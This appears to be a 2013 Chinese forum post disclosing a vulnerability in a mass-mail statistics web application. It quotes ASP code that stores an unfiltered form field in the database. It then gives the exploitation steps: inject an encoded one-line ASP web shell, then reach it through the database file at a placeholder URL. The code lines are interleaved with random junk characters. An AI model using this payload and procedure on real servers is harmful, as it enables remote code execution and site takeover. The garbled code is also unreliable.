找回密码
 立即注册
查看: 3035|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
8 q. s7 q. @" |3 z( d* T
' P9 T8 n1 j$ KIF Request.QueryString("Action")="del" Then 1 }% w" n- o/ j9 b# h
ID=Request.QueryString("ID") / _: E2 M! M; H  m4 ]
IF Countss ("tui","Fenlei",ID )<>0 then
0 P0 g) R- j( `- Z8 a( u* n; O8 T'略
0 O" o) M. ]4 x2 Q8 I: }% w! B) c! X) dIF Request.QueryString("Action")="Add" Then
. ?! Q4 D! Z) p. BTname=Request.Form("Typename")
8 `; Z1 X7 s1 KSet Rs=Server.CreateObject("adodb.Recordset")
7 N  O# r7 S  t4 p# n5 _& bSql="Select * From Fenlei Order by id Desc " * K3 G; U- u/ V. x
Rs.Open Sql,Conn,1,3 0 r2 Q7 f. F2 d; ~
Rs.Addnew # \8 p  z% e9 j7 e6 H
Rs("Typename")=Tname 5 c: _( `  _* b. C/ q2 B; N) U- u
'略 # e  c8 q! z, ^3 M7 C% ~" [3 I
Set Rs=Server.CreateObject("adodb.Recordset") 7 l4 P, V4 V) b& I. M
Sql="Select * From Fenlei Order by id Desc " % A: J! d9 \  K4 {8 o
Rs.Open Sql,Conn,1,1 $ s8 k6 {  l8 h* r2 {8 Y
'略
" X/ l% x+ B. r%>- Y! [" E6 y. B& B" H
1 U+ ^& {3 m- C# S  v

/ Y' o, i* z$ o: |7 F3 F6 e 3 g! [! e9 _  u# C
没有过滤,直接写入数据库。  m9 }7 T3 L! \) W5 c' X, |/ l. c
' O2 F" p; W7 V' m7 I5 |% {3 A) ]
利用方法:
1 G. X5 D8 ?# L. v# a: H # I( Q' V6 e8 `7 l2 U% A  t* ~
插入:┼攠數畣整爠煥敵瑳∨≡┩>( f7 r2 [4 J2 |! M

+ E. D& i* x8 L& d
) J; o; y3 e0 s- m) P* N5 ~7 T2 H连接: http://www.xxx.com/###tongbaner.asa
; @7 O' e& N5 \1 j" j'默认安装文件: $ P7 e0 W9 h& w4 w
'install.asp& m# D5 r- w* Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表